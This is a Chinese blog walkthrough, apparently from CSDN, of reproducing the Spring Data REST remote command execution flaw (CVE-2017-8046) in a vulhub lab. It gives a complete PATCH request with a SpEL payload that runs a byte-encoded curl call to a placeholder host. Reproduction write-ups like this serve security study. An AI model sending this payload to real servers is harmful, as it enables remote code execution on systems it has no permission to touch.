【vulhub】Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)

最新推荐文章于 2024-05-31 19:04:00 发布
最新推荐文章于 2024-05-31 19:04:00 发布
阅读量509 收藏
点赞数
文章标签: spring 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42884199/article/details/121720423
版权

一、启动靶机

docker-compose up -d

在这里插入图片描述

二、生成payload

curl http://xx.xx.xx.xx/Hacker

将执行的命令转换十进制

99,117,114,108,32,104,116,116,112,58,47,47,120,120,46,120,120,46,120,120,46,120,120,47,72,97,99,107,101,114

在这里插入图片描述

payload:

PATCH /customers/1 HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 237

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{99,117,114,108,32,104,116,116,112,58,47,47,120,120,46,120,120,46,120,120,46,120,120,47,72,97,99,107,101,114}))/lastname", "value": "vulhub" }]

三、发送payload

在这里插入图片描述

四、检验

在这里插入图片描述
首先注意几点:
1.Content-Type:application/json-patch+json
2.请求数据必须是json数组
3.JSON Patch方法提交的数据必须包含一个path成员,用于定位数据,同时还必须包含op成员。

Crazy_Yu8
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
首先,我们需要理解什么是远程命令执行漏洞。RCE漏洞允许攻击者通过网络在目标系统上执行任意命令,通常是因为程序处理用户输入时存在不安全的代码实践。在Spring4Shell漏洞中,问题出在Spring MVC和Spring WebFlux...
CVE-2017-8046 Spring Data Rest 远程命令执行漏洞复现(最详细版本)
精品博客,你值得一看~
09-17 672
REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码.先cd到spring目录下的CVE-2017-8046里面,然后使用docker-compose启动环境.一切都准备好之后就可以启动CVE-2017-8046 的环境了.
vulhub-漏洞复现(Spring Data Rest 远程命令执行漏洞CVE-2017-8046))
weixin_45095113的博客
12-08 477
vulhub漏洞复现
spring远程命令执行漏洞复现(CVE-2017-8046
最新发布
2301_82197189的博客
05-31 251
Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码。
vulhubSpring Data Rest 远程命令执行漏洞CVE-2017-8046漏洞复现验证和getshell。
qq_45300786的博客
08-01 840
漏洞详情 Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 参考链接: http://xxlegend.com/2017/09/29/Spring%20Data%20Rest服务器PATCH请求远程代码执行漏洞CVE-2017-8046补充分析/ https://tech.meituan.
vulhubSpringCVE-2017-8046漏洞复现
weixin_41438728的博客
12-01 952
vulhubSpringCVE-2017-8046漏洞复现Spring Data Rest 远程命令执行漏洞CVE-2017-8046漏洞复现漏洞说明漏洞利用条件和方式漏洞影响范围漏洞检测环境搭建漏洞复现漏洞修复 Spring Data Rest 远程命令执行漏洞CVE-2017-8046漏洞复现 漏洞说明 Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),p
Spring data rest漏洞在IDEA中复现(CVE-2017-8046
wxzyyds的博客
11-06 1218
这篇文章主要讲述了spring data restCVE-2017-8046)由于spel表达式没有进行过滤而导致的远程RCE,本片文章利用了IDEA中的动态调试,实现了对于漏洞产生原因的详细复现
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。... 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行
weixin_42282189的博客
09-13 723
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码 影响范围: Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3 Spring Boot version < 2.0.0M4 Spring Data r.
CVE-2017-8046-Spring Data Rest RCE 漏洞复现
m0_58596609的博客
04-22 1133
CVE-2017-8046-Spring Data Rest RCE 漏洞复现
Spring Data Rest 远程命令执行漏洞CVE-2017-8046
黑白的博客
12-20 1212
声明 好好学习,天天向上 漏洞描述 Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 影响范围 pivotal Spring Data REST < 2.5.12 2.6.7 3.0 RC3 pivotal Spring Boot < 2.0.0M4 pivotal Sprin
vulhub-Spring Data Rest 远程命令执行漏洞CVE-2017-8046
weixin_42513429的博客
08-20 164
https://vulhub.org/#/environments/spring/CVE-2017-8046/ https://blog.csdn.net/qq_45300786/article/details/119301365 Spring Data Rest 远程命令执行漏洞CVE-2017-8046) 略去docker,仅做复现漏洞记录 访问服务器,看到服务器返回json,根据提示访问customers 抓包访问的/customers/1 修改官方的payload PATCH /cust.
漏洞复现----41、Spring Data Rest 远程命令执行漏洞CVE-2017-8046
七天
06-30 1098
Spring Data Rest 远程命令执行漏洞CVE-2017-8046
Spring Data REST 远程代码执行漏洞CVE-2017-8046)分析与复现
一个有情怀的程序猿博客
06-30 1060
前言 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL(Spring Expression Language)。对于开发者而言,引入新的工具显然是令人兴奋的,但是对于运维人员,也许是噩耗的开始。类比Struts 2框架,会发现绝大部分的安全漏洞都和ognl脱不了干系。尤其是远程命令执行漏洞,占据了多少甲方乙方工程师的夜晚/周末,这导致Struts 2越来越不受待见。 因此,我们有理由相信Spring引入SpEL必然增加安全风险。事实上,过去多个Spring CVE都与其..
CVE-2017-8046 Spring Data Rest 远程命令执行漏洞
weixin_45715461的博客
08-11 1033
本文只要是学习poc、exp的编写,对于漏洞的原理不进行深入的介绍。
vulhubspringCVE-2017-8046漏洞复现
yougexiaojiuguan的博客
11-29 332
学习过程中的记录,为了方便自己查看
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值